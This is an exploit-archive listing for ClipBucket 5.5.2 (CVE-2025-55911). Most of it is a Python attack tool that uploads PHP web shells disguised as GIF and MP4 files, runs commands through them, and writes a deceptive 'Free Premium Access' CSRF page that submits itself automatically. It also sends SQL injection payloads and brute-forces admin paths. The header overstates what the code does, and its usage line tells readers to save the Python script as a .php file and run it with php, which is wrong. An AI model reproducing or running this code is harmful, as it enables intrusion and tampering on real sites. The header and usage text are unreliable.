Share
## https://sploitus.com/exploit?id=PACKETSTORM:212539
=============================================================================================================================================
| # Title : ClipBucket 5.5.2 Build 90 Practical Exploitation Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/MacWarrior/clipbucket-v5/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211129/ & CVE-2025-55911
[+] Summary : An enhanced Python penetration testing tool designed specifically for ClipBucket video sharing platform vulnerability assessment and exploitation.Key Capabilities
1. Advanced RCE (Remote Code Execution)
Multiple PHP shell payloads (c99, WSO-style, reverse shell)
Bypass techniques: Double extensions, null byte injection, MIME type spoofing
Smart detection: Automatic shell validation and access level assessment
Post-exploitation: Auto-commands for system enumeration
2. File Upload Exploitation
6 different payload types with various obfuscation methods
Multiple upload endpoints: Standard, AJAX, action-based
Response analysis: Smart parsing of upload responses to locate shells
Success verification: Automated shell testing with command execution
3. SQL Injection Attacks
Comprehensive testing: Union-based, Error-based, Time-based, Blind SQLi
Data extraction: Automatic database/table/column enumeration
Detailed reporting: Complete payload analysis and exploitation examples
Multi-endpoint testing: Tests multiple potential injection points
4. Additional Attack Vectors
LFI (Local File Inclusion): /etc/passwd, config files, PHP filter wrappers
Directory brute-forcing: 20-thread concurrent scanning for hidden paths
CSRF exploitation: Attack vector identification and PoC generation
Admin panel discovery: Common ClipBucket admin paths
[+] Usage : * : Save this file as: exploit.php
Run: php exploit.php
[+] POC :
#!/usr/bin/env python3
"""
ClipBucket Practical Exploitation Tool
"""
import requests
import json
import time
import random
import os
import sys
import re
import urllib3
from urllib.parse import urlparse
# تعطيل تحذيرات SSL
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class ClipBucketExploiter:
def __init__(self, target_url):
self.target = target_url.rstrip('/')
self.session = requests.Session()
self.session.verify = False
self.session.timeout = 10
# إعداد headers
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.9',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest'
})
self.vulnerabilities = []
self.shell_urls = []
def print_status(self, message, status="info"):
"""طباعة رسالة باللون المناسب"""
colors = {
"info": "\033[96m", # أزرق سماوي
"success": "\033[92m", # أخضر
"warning": "\033[93m", # أصفر
"error": "\033[91m", # أحمر
"critical": "\033[95m" # بنفسجي
}
color = colors.get(status, "\033[97m")
print(f"{color}[{status.upper()}] {message}\033[0m")
def check_clipbucket(self):
"""التحقق مما إذا كان الموقع يستخدم ClipBucket"""
self.print_status("Checking if website uses ClipBucket...", "info")
try:
# فحص الصفحة الرئيسية
resp = self.session.get(self.target)
# علامات ClipBucket
indicators = [
'clipbucket', 'CB', 'upload.php', 'video_upload',
'action=upload', 'file_uploader', 'video-upload',
'videobb', 'my_videos', 'video_manager'
]
found = []
for indicator in indicators:
if indicator.lower() in resp.text.lower():
found.append(indicator)
if found:
self.print_status(f"ClipBucket indicators found: {', '.join(found[:3])}", "success")
# فحص upload.php مباشرة
upload_test = f"{self.target}/upload.php"
try:
upload_resp = self.session.get(upload_test, timeout=5)
if upload_resp.status_code == 200:
self.print_status("upload.php is accessible!", "success")
return True
else:
self.print_status(f"upload.php returned status: {upload_resp.status_code}", "warning")
except:
self.print_status("upload.php is not accessible", "warning")
return True
else:
self.print_status("No clear ClipBucket indicators found", "warning")
return False
except Exception as e:
self.print_status(f"Connection error: {str(e)}", "error")
return False
def test_upload_endpoint(self):
"""اختبار نقطة رفع الملفات"""
self.print_status("Testing upload.php endpoint...", "info")
upload_url = f"{self.target}/upload.php"
# اختبار HEAD أولاً
try:
head_resp = self.session.head(upload_url, timeout=5)
self.print_status(f"HEAD request: Status {head_resp.status_code}", "info")
except:
pass
# اختبار GET
try:
get_resp = self.session.get(upload_url, timeout=5)
self.print_status(f"GET request: Status {get_resp.status_code}, Size: {len(get_resp.text)} chars", "info")
# البحث عن علامات نموذج الرفع
if 'upload' in get_resp.text.lower() or 'file' in get_resp.text.lower():
self.print_status("Upload form detected", "success")
return True
else:
self.print_status("No upload form detected in response", "warning")
return False
except Exception as e:
self.print_status(f"Error testing upload endpoint: {str(e)}", "error")
return False
def exploit_file_upload(self):
"""استغلال ثغرة رفع الملفات"""
self.print_status("Attempting file upload exploitation...", "info")
# بايلودات مختلفة
payloads = [
{
'filename': 'test.php',
'content': b'<?php echo "VULNERABLE"; ?>',
'mime': 'application/x-php'
},
{
'filename': 'shell.php.gif',
'content': b'GIF89a<?php system($_GET["cmd"]); ?>',
'mime': 'image/gif'
},
{
'filename': 'exploit.mp4.php',
'content': b'\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00mp42isom<?php echo shell_exec($_GET["c"]); ?>',
'mime': 'video/mp4'
}
]
for payload in payloads:
self.print_status(f"Trying payload: {payload['filename']}", "info")
files = {
'Filedata': (payload['filename'], payload['content'], payload['mime'])
}
data = {
'title': 'Test Video Upload',
'collection_id': '1'
}
try:
response = self.session.post(f"{self.target}/upload.php",
files=files,
data=data,
timeout=15)
self.print_status(f"Response status: {response.status_code}", "info")
self.print_status(f"Response preview: {response.text[:200]}", "info")
# تحليل الرد
if response.status_code == 200:
# البحث عن إشارات النجاح
success_keywords = ['success', 'file_name', 'uploaded', 'complete', 'yes']
for keyword in success_keywords:
if keyword in response.text.lower():
self.print_status(f"Upload successful! Keyword '{keyword}' found", "success")
# محاولة استخراج اسم الملف
filename = self.extract_filename(response.text)
if filename:
shell_url = f"{self.target}/temp/{filename}"
self.shell_urls.append(shell_url)
self.print_status(f"Potential shell: {shell_url}", "critical")
# اختبار الشل
self.test_shell_access(shell_url, payload['filename'])
return True
# تحليل JSON
try:
json_data = json.loads(response.text)
if 'file_name' in json_data:
filename = json_data['file_name']
shell_url = f"{self.target}/temp/{filename}"
self.shell_urls.append(shell_url)
self.print_status(f"JSON response - Shell: {shell_url}", "critical")
return True
except:
pass
except Exception as e:
self.print_status(f"Upload error: {str(e)}", "error")
return False
def extract_filename(self, response_text):
"""استخراج اسم الملف من الرد"""
patterns = [
r'"file_name"\s*:\s*"([^"]+)"',
r"'file_name'\s*:\s*'([^']+)'",
r'file_name["\']?\s*[:=]\s*["\']?([a-zA-Z0-9._-]+)',
r'filename["\']?\s*[:=]\s*["\']?([a-zA-Z0-9._-]+)'
]
for pattern in patterns:
matches = re.findall(pattern, response_text)
if matches:
filename = matches[0]
# إضافة امتداد إذا لم يكن موجوداً
if '.' not in filename:
filename += '.mp4'
return filename
return None
def test_shell_access(self, shell_url, original_filename):
"""اختبار الوصول إلى الشل"""
self.print_status(f"Testing shell access: {shell_url}", "info")
# بناء على نوع الملف
if '.php' in original_filename.lower():
# اختبار PHP shell
test_url = f"{shell_url}?cmd=echo+CLIPBUCKET_TEST"
try:
response = self.session.get(test_url, timeout=10)
if 'CLIPBUCKET_TEST' in response.text:
self.print_status("PHP shell is ACTIVE!", "success")
# جلب معلومات النظام
info_url = f"{shell_url}?cmd=whoami && pwd"
info_response = self.session.get(info_url, timeout=10)
self.print_status(f"System info: {info_response.text[:100]}", "success")
# حفظ رابط الشل
with open('shells_found.txt', 'a') as f:
f.write(f"{shell_url}\n")
f.write(f"Test command: {shell_url}?cmd=whoami\n")
f.write(f"Response: {info_response.text[:200]}\n\n")
return True
except:
pass
# محاولة الوصول المباشر
try:
direct_response = self.session.get(shell_url, timeout=10)
if direct_response.status_code == 200:
self.print_status(f"File is accessible (status: {direct_response.status_code})", "success")
return True
except:
pass
self.print_status("Shell access test failed", "warning")
return False
def exploit_csrf(self):
"""استغلال ثغرة CSRF"""
self.print_status("Testing for CSRF vulnerability...", "info")
test_data = {
'updateVideo': '1',
'videoid': '99999', # ID عالي لتجنب التأثير على فيديوهات حقيقية
'title': 'CSRF Security Test',
'desc': 'This is a security test for CSRF vulnerability',
'tags': 'test,security,csrf'
}
try:
response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=10)
self.print_status(f"CSRF test response status: {response.status_code}", "info")
self.print_status(f"Response preview: {response.text[:150]}", "info")
if response.status_code == 200:
if 'valid' in response.text.lower() or 'success' in response.text.lower():
self.print_status("CSRF vulnerability CONFIRMED!", "success")
self.vulnerabilities.append('CSRF')
# إنشاء صفحة استغلال
self.create_csrf_exploit_page()
return True
else:
self.print_status("CSRF protection might be enabled", "warning")
except Exception as e:
self.print_status(f"CSRF test error: {str(e)}", "error")
return False
def create_csrf_exploit_page(self):
"""إنشاء صفحة استغلال CSRF"""
exploit_html = f'''<!DOCTYPE html>
<html>
<head>
<title>Free Premium Access</title>
<style>
body {{
font-family: Arial, sans-serif;
text-align: center;
padding: 50px;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
color: white;
}}
.container {{
background: rgba(255,255,255,0.1);
padding: 30px;
border-radius: 15px;
backdrop-filter: blur(10px);
max-width: 600px;
margin: 0 auto;
}}
button {{
background: #4CAF50;
color: white;
padding: 15px 30px;
border: none;
border-radius: 8px;
font-size: 18px;
cursor: pointer;
margin: 20px;
}}
button:hover {{
background: #45a049;
}}
</style>
</head>
<body>
<div class="container">
<h1> Claim Your Free Premium Account!</h1>
<p>Click the button below to activate premium features</p>
<form id="attack" action="{self.target}/upload.php" method="POST" style="display:none;">
<input type="hidden" name="updateVideo" value="1">
<input type="hidden" name="videoid" value="1">
<input type="hidden" name="title" value="ACCOUNT HACKED">
<input type="hidden" name="desc" value="This account was compromised via CSRF">
<input type="hidden" name="tags" value="hacked">
</form>
<button onclick="launchAttack()">
ACTIVATE NOW
</button>
<script>
function launchAttack() {{
document.getElementById('attack').submit();
alert('Premium activated!');
}}
// Auto-attack after 5 seconds
setTimeout(launchAttack, 5000);
</script>
</div>
</body>
</html>'''
with open('csrf_attack.html', 'w', encoding='utf-8') as f:
f.write(exploit_html)
self.print_status("CSRF exploit page created: csrf_attack.html", "success")
def test_sqli(self):
"""اختبار ثغرة SQL Injection"""
self.print_status("Testing for SQL Injection...", "info")
test_payloads = [
("1' OR '1'='1", "Basic boolean"),
("1' AND SLEEP(5)--", "Time-based"),
("1' UNION SELECT NULL,version()--", "Union injection")
]
for payload, description in test_payloads:
self.print_status(f"Testing: {description}", "info")
test_data = {
'getForm': '1',
'vid': payload,
'objId': 'test',
'title': 'SQLi Test'
}
try:
if 'SLEEP' in payload:
start_time = time.time()
response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=15)
elapsed = time.time() - start_time
if elapsed > 4:
self.print_status(f"Time-based SQLi detected! Delay: {elapsed:.2f} seconds", "success")
self.vulnerabilities.append('SQL Injection (Time-based)')
return True
else:
response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=10)
error_indicators = ['sql', 'SQL', 'mysql', 'MySQL', 'syntax error', 'query', 'database']
for indicator in error_indicators:
if indicator.lower() in response.text.lower():
self.print_status(f"Error-based SQLi detected: {indicator}", "success")
self.vulnerabilities.append('SQL Injection (Error-based)')
with open('sqli_evidence.txt', 'w') as f:
f.write(f"Payload: {payload}\n")
f.write(f"Response:\n{response.text}\n")
return True
except Exception as e:
self.print_status(f"SQLi test error: {str(e)}", "error")
self.print_status("No SQL injection vulnerability detected", "warning")
return False
def find_admin_panel(self):
"""البحث عن لوحة التحكم"""
self.print_status("Searching for admin panel...", "info")
common_paths = [
'/admin',
'/admin_area',
'/administrator',
'/admin.php',
'/admin/login.php',
'/admin/index.php',
'/dashboard',
'/controlpanel',
'/cp',
'/admincp',
'/cb_admin',
'/clipbucket_admin',
'/admin_dashboard',
'/manage',
'/manager'
]
found_panels = []
for path in common_paths:
url = f"{self.target}{path}"
try:
# طلب HEAD أولاً (أسرع)
head_resp = self.session.head(url, timeout=3, allow_redirects=False)
if head_resp.status_code < 400:
# طلب GET للتحقق من المحتوى
get_resp = self.session.get(url, timeout=5)
# تحقق من أن الصفحة تحتوي على علامات لوحة تحكم
if any(keyword in get_resp.text.lower() for keyword in ['login', 'admin', 'dashboard', 'control', 'manage', 'panel']):
self.print_status(f"Admin panel found: {url}", "success")
found_panels.append(url)
# حفظ المحتوى للفحص
with open('admin_panel_found.txt', 'a') as f:
f.write(f"URL: {url}\n")
f.write(f"Status: {get_resp.status_code}\n")
f.write(f"Size: {len(get_resp.text)} chars\n")
f.write("-" * 50 + "\n")
except:
continue
if found_panels:
self.print_status(f"Found {len(found_panels)} admin panels", "success")
return found_panels
else:
self.print_status("No admin panels found", "warning")
return []
def scan_directories(self):
"""مسح الدلائل المهمة"""
self.print_status("Scanning for important directories...", "info")
directories = [
'/uploads',
'/upload',
'/files',
'/temp',
'/tmp',
'/logs',
'/backup',
'/backups',
'/data',
'/database',
'/config',
'/includes',
'/install',
'/upgrade',
'/assets',
'/images',
'/videos',
'/media'
]
found_dirs = []
for directory in directories:
url = f"{self.target}{directory}"
try:
response = self.session.head(url, timeout=3)
if response.status_code < 400:
self.print_status(f"Directory found: {url} (Status: {response.status_code})", "success")
found_dirs.append(url)
except:
pass
return found_dirs
def generate_report(self):
"""توليد تقرير النتائج"""
self.print_status("\n" + "="*60, "info")
self.print_status("EXPLOITATION REPORT", "critical")
self.print_status("="*60, "info")
report = []
report.append(f"Target: {self.target}")
report.append(f"Scan Time: {time.strftime('%Y-%m-%d %H:%M:%S')}")
report.append("")
# الثغرات المكتشفة
if self.vulnerabilities or self.shell_urls:
report.append("VULNERABILITIES FOUND:")
report.append("-" * 40)
for vuln in self.vulnerabilities:
report.append(f"✓ {vuln}")
if self.shell_urls:
report.append(f"✓ Remote Code Execution: {len(self.shell_urls)} shells deployed")
for i, shell in enumerate(self.shell_urls, 1):
report.append(f" Shell {i}: {shell}")
report.append("")
# التوصيات
report.append("RECOMMENDATIONS:")
report.append("-" * 40)
if 'CSRF' in self.vulnerabilities:
report.append("• Implement CSRF tokens on all forms")
if 'SQL Injection' in ' '.join(self.vulnerabilities):
report.append("• Use prepared statements for database queries")
if self.shell_urls:
report.append("• Implement strict file upload validation")
report.append("• Disable PHP execution in upload directories")
else:
report.append("No critical vulnerabilities found")
report.append("")
report.append("FILES GENERATED:")
report.append("-" * 40)
# عرض الملفات المولدة
files_to_check = ['shells_found.txt', 'csrf_attack.html',
'admin_panel_found.txt', 'sqli_evidence.txt']
for file in files_to_check:
if os.path.exists(file):
report.append(f"• {file}")
# كتابة التقرير
report_text = "\n".join(report)
print("\n" + report_text)
with open('exploitation_report.txt', 'w', encoding='utf-8') as f:
f.write(report_text)
self.print_status("\nReport saved to: exploitation_report.txt", "success")
def run_complete_scan(self):
"""تشغيل مسح شامل"""
self.print_status("Starting complete ClipBucket vulnerability scan...", "info")
# الخطوة 1: التحقق من ClipBucket
if not self.check_clipbucket():
self.print_status("Target doesn't appear to be ClipBucket. Stopping scan.", "error")
return
# الخطوة 2: اختبار upload.php
if not self.test_upload_endpoint():
self.print_status("upload.php not functioning properly", "warning")
# الخطوة 3: استغلال رفع الملفات
self.exploit_file_upload()
# الخطوة 4: اختبار CSRF
self.exploit_csrf()
# الخطوة 5: اختبار SQL Injection
self.test_sqli()
# الخطوة 6: البحث عن لوحة التحكم
self.find_admin_panel()
# الخطوة 7: مسح الدلائل
self.scan_directories()
# الخطوة 8: التقرير النهائي
self.generate_report()
def main():
"""الدالة الرئيسية"""
print("\033[95m" + """
╔══════════════════════════════════════════════════════╗
║ ClipBucket Exploitation Scanner ║
║ By indoushka ║
╚══════════════════════════════════════════════════════╝
""" + "\033[0m")
if len(sys.argv) < 2:
print("Usage:")
print(f" python {sys.argv[0]} <target_url>")
print("\nExamples:")
print(f" python {sys.argv[0]} https://example.com")
print(f" python {sys.argv[0]} http://192.168.1.100")
print(f" python {sys.argv[0]} http://localhost/clipbucket")
return
target = sys.argv[1]
# إضافة http:// إذا لم يكن موجوداً
if not target.startswith(('http://', 'https://')):
target = 'http://' + target
# إنشاء واستخدام الكلاس
exploiter = ClipBucketExploiter(target)
try:
exploiter.run_complete_scan()
except KeyboardInterrupt:
print("\n\nScan interrupted by user")
except Exception as e:
print(f"\nError during scan: {str(e)}")
if __name__ == "__main__":
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================